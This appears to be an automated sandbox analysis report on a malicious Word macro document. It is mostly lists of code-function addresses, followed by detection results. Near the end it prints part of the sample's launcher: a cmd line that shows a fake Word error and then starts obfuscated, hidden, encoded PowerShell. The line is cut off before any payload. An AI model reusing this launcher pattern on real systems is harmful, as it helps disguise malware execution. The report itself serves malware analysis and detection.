Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002212E2 10_2_002212E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002188E5 10_2_002188E5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002226F5 10_2_002226F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00211CFA 10_2_00211CFA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002220C5 10_2_002220C5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002196CD 10_2_002196CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00228ADC 10_2_00228ADC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00220D33 10_2_00220D33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021F536 10_2_0021F536
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021BB3A 10_2_0021BB3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021153C 10_2_0021153C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00227D03 10_2_00227D03
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00220F0C 10_2_00220F0C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021B112 10_2_0021B112
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00222B16 10_2_00222B16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022511B 10_2_0022511B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00227F1F 10_2_00227F1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00228D1C 10_2_00228D1C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00225D1D 10_2_00225D1D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021C769 10_2_0021C769
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00220B68 10_2_00220B68
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00221773 10_2_00221773
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021E377 10_2_0021E377
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00215B79 10_2_00215B79
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00218F78 10_2_00218F78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00229B45 10_2_00229B45
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00222349 10_2_00222349
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00228F49 10_2_00228F49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00216754 10_2_00216754
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021B75F 10_2_0021B75F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002169A0 10_2_002169A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002117AC 10_2_002117AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002273AC 10_2_002273AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002261B8 10_2_002261B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00226DB9 10_2_00226DB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00229586 10_2_00229586
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022878F 10_2_0022878F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021F98C 10_2_0021F98C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00217998 10_2_00217998
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021839D 10_2_0021839D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00216D9F 10_2_00216D9F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002231E2 10_2_002231E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00223FE7 10_2_00223FE7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021D7EB 10_2_0021D7EB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002267E9 10_2_002267E9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002271EF 10_2_002271EF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00221BDF 10_2_00221BDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00219FDC 10_2_00219FDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00402C63 11_2_00402C63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0040EE78 11_2_0040EE78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0040B41F 11_2_0040B41F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004102C3 11_2_004102C3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0040C0C6 11_2_0040C0C6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004142DA 11_2_004142DA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0040568E 11_2_0040568E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00413895 11_2_00413895
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00414B41 11_2_00414B41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00407B63 11_2_00407B63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00408736 11_2_00408736
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004163C1 11_2_004163C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0040F444 11_2_0040F444
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0040EA4C 11_2_0040EA4C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0040E05A 11_2_0040E05A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00415A61 11_2_00415A61
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0041687F 11_2_0041687F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0041340A 11_2_0041340A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00417A0F 11_2_00417A0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00402A30 11_2_00402A30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00404A35 11_2_00404A35
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00409A37 11_2_00409A37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004120C5 11_2_004120C5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004096CD 11_2_004096CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00418ADC 11_2_00418ADC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004112E2 11_2_004112E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004088E5 11_2_004088E5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004126F5 11_2_004126F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00401CFA 11_2_00401CFA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00401280 11_2_00401280
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0041889D 11_2_0041889D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004062A3 11_2_004062A3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0041A0AF 11_2_0041A0AF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004060B9 11_2_004060B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004080BA 11_2_004080BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004048BD 11_2_004048BD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00419B45 11_2_00419B45
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00412349 11_2_00412349
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00418F49 11_2_00418F49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00406754 11_2_00406754
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0040B75F 11_2_0040B75F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0040C769 11_2_0040C769
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00410B68 11_2_00410B68
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00411773 11_2_00411773
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0040E377 11_2_0040E377
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00408F78 11_2_00408F78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00405B79 11_2_00405B79
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00417D03 11_2_00417D03
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00410F0C 11_2_00410F0C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0040B112 11_2_0040B112
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00412B16 11_2_00412B16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0041511B 11_2_0041511B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00415D1D 11_2_00415D1D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00418D1C 11_2_00418D1C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00417F1F 11_2_00417F1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00410D33 11_2_00410D33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0040F536 11_2_0040F536
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0040BB3A 11_2_0040BB3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0040153C 11_2_0040153C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00409FDC 11_2_00409FDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00411BDF 11_2_00411BDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004131E2 11_2_004131E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00413FE7 11_2_00413FE7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004167E9 11_2_004167E9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0040D7EB 11_2_0040D7EB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004171EF 11_2_004171EF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00419586 11_2_00419586
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0040F98C 11_2_0040F98C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0041878F 11_2_0041878F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00407998 11_2_00407998
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0040839D 11_2_0040839D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00406D9F 11_2_00406D9F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004069A0 11_2_004069A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004017AC 11_2_004017AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004173AC 11_2_004173AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00416DB9 11_2_00416DB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004161B8 11_2_004161B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002AB41F 12_2_002AB41F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002A2C63 12_2_002A2C63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002AEE78 12_2_002AEE78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002A568E 12_2_002A568E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B3895 12_2_002B3895
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B02C3 12_2_002B02C3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002AC0C6 12_2_002AC0C6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B42DA 12_2_002B42DA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002A8736 12_2_002A8736
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002A7B63 12_2_002A7B63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B4B41 12_2_002B4B41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B63C1 12_2_002B63C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002A2A30 12_2_002A2A30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002A9A37 12_2_002A9A37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002A4A35 12_2_002A4A35
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B340A 12_2_002B340A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B7A0F 12_2_002B7A0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B5A61 12_2_002B5A61
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B687F 12_2_002B687F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002AEA4C 12_2_002AEA4C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002AF444 12_2_002AF444
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002AE05A 12_2_002AE05A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002BA0AF 12_2_002BA0AF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002A62A3 12_2_002A62A3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002A80BA 12_2_002A80BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002A60B9 12_2_002A60B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002A48BD 12_2_002A48BD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002A1280 12_2_002A1280
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B889D 12_2_002B889D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B12E2 12_2_002B12E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002A88E5 12_2_002A88E5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002A1CFA 12_2_002A1CFA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B26F5 12_2_002B26F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002A96CD 12_2_002A96CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B20C5 12_2_002B20C5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B8ADC 12_2_002B8ADC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002ABB3A 12_2_002ABB3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002A153C 12_2_002A153C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B0D33 12_2_002B0D33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002AF536 12_2_002AF536
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B0F0C 12_2_002B0F0C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B7D03 12_2_002B7D03
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B511B 12_2_002B511B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B7F1F 12_2_002B7F1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B5D1D 12_2_002B5D1D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B8D1C 12_2_002B8D1C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002AB112 12_2_002AB112
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B2B16 12_2_002B2B16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002AC769 12_2_002AC769
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B0B68 12_2_002B0B68
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002A8F78 12_2_002A8F78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002A5B79 12_2_002A5B79
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B1773 12_2_002B1773
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002AE377 12_2_002AE377
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B2349 12_2_002B2349
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B8F49 12_2_002B8F49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B9B45 12_2_002B9B45
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002AB75F 12_2_002AB75F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002A6754 12_2_002A6754
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002A17AC 12_2_002A17AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B73AC 12_2_002B73AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002A69A0 12_2_002A69A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B6DB9 12_2_002B6DB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B61B8 12_2_002B61B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B878F 12_2_002B878F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002AF98C 12_2_002AF98C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B9586 12_2_002B9586
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002A7998 12_2_002A7998
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002A6D9F 12_2_002A6D9F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002A839D 12_2_002A839D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002AD7EB 12_2_002AD7EB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B67E9 12_2_002B67E9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B71EF 12_2_002B71EF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B31E2 12_2_002B31E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B3FE7 12_2_002B3FE7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B1BDF 12_2_002B1BDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002A9FDC 12_2_002A9FDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002AB41F 13_2_002AB41F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002A2C63 13_2_002A2C63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002AEE78 13_2_002AEE78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002A568E 13_2_002A568E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002B3895 13_2_002B3895
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002B02C3 13_2_002B02C3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002AC0C6 13_2_002AC0C6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002B42DA 13_2_002B42DA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002A8736 13_2_002A8736
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002A7B63 13_2_002A7B63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002B4B41 13_2_002B4B41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002B63C1 13_2_002B63C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002A2A30 13_2_002A2A30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002A9A37 13_2_002A9A37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002A4A35 13_2_002A4A35
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002B340A 13_2_002B340A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002B7A0F 13_2_002B7A0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002B5A61 13_2_002B5A61
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002B687F 13_2_002B687F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002AEA4C 13_2_002AEA4C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002AF444 13_2_002AF444
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002AE05A 13_2_002AE05A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002BA0AF 13_2_002BA0AF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002A62A3 13_2_002A62A3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002A80BA 13_2_002A80BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002A60B9 13_2_002A60B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002A48BD 13_2_002A48BD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002A1280 13_2_002A1280
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002B889D 13_2_002B889D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002B12E2 13_2_002B12E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002A88E5 13_2_002A88E5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002A1CFA 13_2_002A1CFA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002B26F5 13_2_002B26F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002A96CD 13_2_002A96CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002B20C5 13_2_002B20C5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002B8ADC 13_2_002B8ADC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002ABB3A 13_2_002ABB3A
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: bestand-8881014518 00944.doc OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation OLE, VBA macro: Module Wm_t404p8v_, Function Document_open Name: Document_open
Document contains embedded VBA macros
Source: bestand-8881014518 00944.doc OLE indicator, VBA macros: true
Yara signature match
Source: 00000005.00000002.2092921880.0000000000366000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.2092945570.0000000001B86000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: O_5Z.dll.5.dr Static PE information: Section: .rsrc ZLIB complexity 0.994955920298
Source: rundll32.exe, 00000006.00000002.2101148433.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095917337.0000000000910000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.expl.evad.winDOC@34/8@1/1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10002D70 SysAllocString,CoCreateInstance,PropVariantClear,SysFreeString,SysFreeString, 7_2_10002D70
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$stand-8881014518 00944.doc Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRCE75.tmp Jump to behavior
Source: bestand-8881014518 00944.doc OLE indicator, Word Document stream: true
Source: bestand-8881014518 00944.doc OLE document summary: title field not present or empty
Source: bestand-8881014518 00944.doc OLE document summary: edited time not present or 0
Source: C:\Windows\System32\msg.exe Console Write: ............L........................... .........................&.....H.&.............#...............................h.......5kU.......&..... Jump to behavior
Source: C:\Windows\System32\msg.exe Console Write: ............L...0...............A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.........&.....L.................&..... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................................................`I.........v.....................K......(.U............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v............0...............................0............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j..... ..............................}..v....(.......0...............(.U.............0............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v............0...............................0............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......U.............................}..v............0.................U.............0............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#...............]..j....................................}..v....(.......0...............................0............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#...............]..j..... ..............................}..v............0.................U.............0............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....'...............m..j....E...............................}..v...../......0.................U.............0............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....+...............m..j....E...............................}..v....Xn......0.................U.............0............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\msg.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
Source: bestand-8881014518 00944.doc Virustotal: Detection: 31%
Source: bestand-8881014518 00944.doc ReversingLabs: Detection: 47%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD 